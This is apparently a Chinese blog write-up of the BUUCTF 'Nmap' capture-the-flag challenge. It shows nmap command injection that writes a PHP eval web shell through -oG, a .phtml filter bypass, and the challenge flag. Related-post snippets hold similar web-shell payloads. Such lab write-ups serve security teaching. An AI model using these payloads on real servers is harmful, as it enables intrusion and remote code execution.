BUUCTF——Nmap

最新推荐文章于 2025-05-19 11:56:00 发布
最新推荐文章于 2025-05-19 11:56:00 发布
阅读量313 收藏 4
点赞数 5
分类专栏: BUUCTF 文章标签: web安全 网络安全 网络 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_71914594/article/details/148030646
版权

BUUCTF——Nmap

进入靶场

在这里插入图片描述

类似于一个nmap的网站

在这里插入图片描述

尝试一下功能

没什么用

看看数据包 既然跟IP相关

伪造一个XXF看看

在这里插入图片描述

拼接了一下没什么用 果然没这么简单

尝试一下命令注入

构造payload 127.0.0.1 | ls

在这里插入图片描述

应该有过滤 加了个\

直接构造个php木马上传试试

127.0.0.1 | ' <?php @eval($_POST["cmd"]);?> -oG shell.php '

在这里插入图片描述

在这里插入图片描述

应该被过滤了

也没有什么提示 盲猜是后缀名 mini绕过试试

双写、php3都试过了 最后phtml成功了

127.0.0.1 | ' <?= @eval($_POST["cmd"]);?> -oG shell.phtml '

在这里插入图片描述

拼接访问一下成功上传

在这里插入图片描述

用蚁剑连接看看

成功连接

在这里插入图片描述

接下来就慢慢找flag

在根目录下找到flag

在这里插入图片描述

flag{aade295d-204f-476f-91ee-299a5fa993a2}

下播!!!!!

在这里插入图片描述

BUUCTF-WEB
ccfly1012的博客
11-02 4074
目录 [HCTF 2018]WarmUp [极客大挑战 2019]EasySQL 总结万能密码 [极客大挑战 2019]Havefun [强网杯 2019]随便注 [ACTF2020 新生赛]Include [SUCTF 2019]EasySQL [极客大挑战 2019]Secret File [ACTF2020 新生赛]Exec [极客大挑战 2019]LoveSQL [GXYCTF2019]Ping Ping Ping [HCTF 2018]WarmUp 打开网页,查看一下源代
2025.1.18——六、Nmap 1 nmap用法|函数绕过
2402_87387800的博客
01-18 725
题目来源:buuctf[网鼎杯2020朱雀组]Nmap1。
BUUCTF——Online Tool
weixin_71914594的博客
04-29 459
工具对该主机进行扫描。同时,它会根据客户端的 IP 地址创建一个沙箱目录,扫描结果会在这个沙箱目录下输出。哥斯拉连接失败,看了一下,shell写的没毛病。构造一个一句话木马payload。这段代码是接收用户通过。
BUUCTF——Basic(2),高级网络安全开发面试题
m0_60666921的博客
04-07 718
Python编程学习,学习内容包含:语法、正则、文件、 网络、多线程等常用库,推荐《Python核心编程》,不要看完;在实际的渗透测试过程中,面对复杂多变的网络环境,当常用工具不能满足实际需求的时候,往往需要对现有工具进行扩展,或者编写符合我们要求的工具、自动化脚本,这个时候就需要具备一定的编程能力。恭喜你,如果学到这里,你基本可以从事一份网络安全相关的工作,比如渗透测试、Web 渗透、安全服务、安全分析等岗位;③漏洞扫描、漏洞利用、原理,利用方法、工具(MSF)、绕过IDS和反病毒侦察。
2020-网鼎杯-朱雀组-Web-nmap
feng的博客
11-03 877
WP 和BUUCTF里的2018 Online Tool非常类似。 首先就是中是个nmap命令注入,有2个方式: 利用-oG,可以将命令和结果写进文件。 利用-iL 和-oN。其中-iL是从inputfilename文件中读取扫描的目标。在这个文件中要有一个主机或者网络的列表,由空格键、制表键或者回车键作为分割符。如果使用-iL-,nmap就会从标准输入stdin读取主机名字。你可以从指定目标一节得到更加详细的信息,-oN是把扫描结果重定向到一个可读的文件logfilename中。 关于escapesh
第三十三题——[BUUCTF 2018]Online Tool
分享简单的安全技术
04-22 274
题目地址:https://buuoj.cn/challenges 解题思路 第一步:进入题目,看到源码 <?php if (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) { $_SERVER['REMOTE_ADDR'] = $_SERVER['HTTP_X_FORWARDED_FOR']; } if(!isset($_GET['host'])) { highlight_file(__FILE__); } else { $host = $
BUUCTF 个人做题记录【7-02】
qq_61620566的博客
07-02 1072
不断学习才会进步,加油!
【CTF】buuctf web 详解(持续更新)
热门推荐
m0_52923241的博客
08-12 5万+
buuctf web[HCTF 2018]WarmUp[极客大挑战 2019]EasySQL[极客大挑战 2019]Havefun[强网杯 2019]随便注[ACTF2020 新生赛]Include[SUCTF 2019]EasySQL[极客大挑战 2019]Secret File[ACTF2020 新生赛]Exec[极客大挑战 2019]LoveSQL[GXYCTF2019]Ping Ping Ping[极客大挑战 2019]Knife[极客大挑战 2019]Http[RoarCTF 2019]Easy
BUUCTF刷题记录(7)
bmth666的博客
10-16 2088
文章目录web[NPUCTF2020]ReadlezPHP web 打ctf(×) 被ctf打(√) [NPUCTF2020]ReadlezPHP 我反序列化真不行,需要多理解理解这方面的内容。 打开用view-source:查看源码,得到信息 进入得到代码,为反序列化 <?php #error_reporting(0); class HelloPhp { public $a; ...
BUU刷题记录——2
weixin_43610673的博客
06-17 2125
[极客大挑战 2019]Upload 上传检测后缀名,文件内容不能有<? 上传a1.jpg GIF89a? <script language="php">eval($_REQUEST[cmd])</script> Bp抓包修改下文件名 不能有php /upload/a1.phtml?cmd=system(‘cat /flag’); [ACTF2020 新生赛]BackupFile /index.php.bak 下载源码 PHP的弱类型特性,int和string是无法直接比
CTF萌新入坑指南(web篇)(21.6.5已更新)
kingdring的博客
09-27 6151
ps:其实在写这篇入坑指南的时候内心还是十分挣扎的,毕竟大佬太多而我自己太太太太菜,然鹅我也不好拒绝温柔善良的郑童鞋的邀请,因此这篇文章只面向最最最新的萌新,各位大佬请自行忽略 前言 web在ctf里面占到的比重还是蛮大的,从国内有ctf赛事以来,web就一直是各 路出题人的宠儿,就比如说前段时间的某次分区赛初赛题目构成是7pwn 7web 1re 1misc,虽然在我看来这个题目分配过于偏激且离谱了,但是足以看出web 在ctf中的重要性,线下赛pwn佬可能更加关键,不过web手对于每个队伍都是
WEB安全--Java安全--shiro550反序列化漏洞
m0_74800552的博客
05-16 495
shiro550反序列化
网络安全-等级保护(等保) 2-7-1 GB/T 25058—2019 第5章 等级保护对象定级与备案
项目管理到售前,一路成长的伙伴!
05-19 461
4. GBT 22239-2019 +GBT 25070—2019 《信息安全技术 网络安全等级保护基础要求》+《信息安全技术 网络安全等级保护安全设计技术要求》一到四级对比表格(在基础要求中添加安全设计技术要求,安全设计技术要求主要用于开发人员和产品经理)个人见解说明:行业/领域定级工作,主要是各个行业/领域的主管部门制定,比如电力、金融等行业都有单独发布等级保护的要求,和通用等级保护要求有一定差异,会根据本行业的业务特性进行制定。GB/T 22240—2020《信息安全技术 网络安全等级保护定级指南》
网络安全-等级保护(等保) 2-7-2 GB/T 25058—2019 第6章 总体安全规划
项目管理到售前,一路成长的伙伴!
05-19 971
等。
Web安全核心内容与常见漏洞总结
weixin_47389477的博客
05-14 412
启用 ‌Content Security Policy(CSP)‌ 限制脚本加载源,阻断 XSS 攻击链。使用参数化查询(Prepared Statements)防御 SQL 注入。对用户输入进行严格校验(如正则表达式匹配),过滤特殊字符(如。输出数据时进行 HTML 实体编码,避免 XSS 攻击。实现细粒度权限管理(如 RBAC 模型),避免越权操作。部署 ‌Web 应用防火墙(WAF)‌ 过滤恶意流量。使用 SSL/TLS 加密数据传输,防止中间人攻击6。强制使用多因素认证(MFA)提升账户安全性。
网络安全-等级保护(等保) 2-7-4 GB/T 25058—2019 第8章 安全运行与维护 第9章 定级对象终止
最新发布
项目管理到售前,一路成长的伙伴!
05-19 844
根据不同的安全保护等级要求的控制粒度,分析所需要运行管理控制内容,并以此定义不同运行管 理角色的职责。
网络安全-等级保护(等保) 2-5-1 GB/T 25070—2019 附录B (资料性附录)第三级系统安全保护环境设计示例
项目管理到售前,一路成长的伙伴!
05-19 473
引用斜体:为非本文件内容,个人注解说明。
网络安全】SQL注入
Dalik1018的博客
05-12 2934
SQL 注入是一种常见的网络攻击手段,它专门针对程序员在编写代码时的疏忽。你在网上注册了一个账号,填写用户名和密码后点击提交。正常情况下,网站会将你输入的信息发送到数据库进行验证,看看用户名是否存在,密码是否正确。但如果网站对用户输入的数据没有进行严格的检查,黑客就有机会在你输入的内容里添加一些特殊的 SQL 语句。
网络安全-等级保护(等保) 2-6 GB/T 36958—2018 《信息安全技术 网络安全等级保护安全管理中心技术要求》-2018-12-28 发布【现行】
项目管理到售前,一路成长的伙伴!
05-16 866
GB 17859—1999、GB/T 5271. 8、GB/T 25069和 GB/T 25070界定的以及下列术语和定义适用于 本文件。安全管理中心作为对网络安全等级保护对象的安全策略及安全计算环境 、安全区域边界和安全通信网络安全机制实施统一管理的系统平台 , 实现统一管理 、统一监控 、统一审计 、综合分析和协同防护。本标准将安全管理中心技术要求分为功能要求 、接口要求和自身安全要求三个大类(如图 1所示)。其中 ,功能要求从系统管理 、安全管理和审计管理三个方面提出具体要求;接口要求。
buuctf nmap
10-12
buuctf是北京邮电大学举办的一场CTF比赛,而nmap是一款常用的网络扫描工具。在CTF比赛中,nmap通常用于扫描主机和端口,以了解目标系统的漏洞和服务。使用nmap可以执行各种扫描类型,如TCP SYN扫描、UDP扫描、操作系统探测等。它还可以提供有关主机的详细信息,如操作系统类型、开放端口和服务等。 关于buuctfnmap
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值